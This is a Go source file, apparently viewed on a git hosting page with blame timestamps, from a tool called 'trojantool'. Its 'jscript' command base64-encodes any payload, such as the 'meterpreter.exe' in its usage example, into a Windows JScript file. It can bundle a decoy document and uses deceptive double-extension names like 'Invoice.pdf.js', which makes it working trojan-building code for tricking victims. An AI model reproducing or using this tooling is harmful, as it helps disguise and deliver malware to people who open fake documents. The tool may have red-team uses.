trojantool/cmd/jscript.go

87 lines
2.2 KiB
Go
Raw Normal View History

2023-08-10 21:42:41 +02:00
package cmd
import (
_ "embed"
2023-08-10 21:53:50 +02:00
"encoding/base64"
2023-08-10 21:42:41 +02:00
"github.com/spf13/cobra"
2023-08-10 21:53:50 +02:00
"os"
"text/template"
2023-08-10 21:42:41 +02:00
)
//go:embed jscript.gojs
var jscriptTmpl string
// jscriptCmd represents the jscript command
var jscriptCmd = &cobra.Command{
Use: "jscript [flags] payload",
Short: "Wraps your payload into a JScript file with optional Decoy",
Long: `JScript is a native Scripting language to Windows without the security features of Powershell, but much more
powerful than CMD, being essentially a funky version of Javascript
Example:
trojantool jscript --output Invoice.pdf.js --decoy Invoice.pdf meterpreter.exe
`,
Run: func(cmd *cobra.Command, args []string) {
2023-08-10 21:53:50 +02:00
type OutData struct {
Encoded string
EncodedDecoy string
}
var outData OutData
tmpl := template.Must(template.New("").Parse(jscriptTmpl))
if len(args) != 1 {
cmd.PrintErr("Please specify one Input file! \n")
_ = cmd.Help()
os.Exit(1)
}
input := args[0]
if input == "" {
cmd.PrintErr("You need to specify an input file!")
}
output, _ := cmd.Flags().GetString("output")
content, err := os.ReadFile(input)
if err != nil {
cmd.PrintErrf("Could not read Input file: %s", err)
}
outData.Encoded = base64.StdEncoding.EncodeToString(content)
decoy, err := cmd.Flags().GetString("decoy")
if err != nil {
cmd.PrintErrf("Could not get Decoy file: %s", err)
}
if decoy != "" {
decoyContent, err := os.ReadFile(decoy)
if err != nil {
cmd.PrintErrf("Could not get Decoy Content file: %s", err)
}
outData.EncodedDecoy = base64.StdEncoding.EncodeToString(decoyContent)
}
outFile, err := os.Create(output)
if err != nil {
cmd.PrintErrf("Could not create output file: %s", err)
}
defer func(outFile *os.File) {
err := outFile.Close()
if err != nil {
}
}(outFile)
err = tmpl.Execute(outFile, outData)
if err != nil {
cmd.PrintErrf("Could not create output file: %s", err)
}
2023-08-10 21:42:41 +02:00
},
}
func init() {
rootCmd.AddCommand(jscriptCmd)
// Here you will define your flags and configuration settings.
jscriptCmd.Flags().String("output", "Document.pdf.js", "This is the Name of the Output file")
jscriptCmd.Flags().String("decoy", "", "Name of the Decoy file, e.g. Invoice.pdf")
}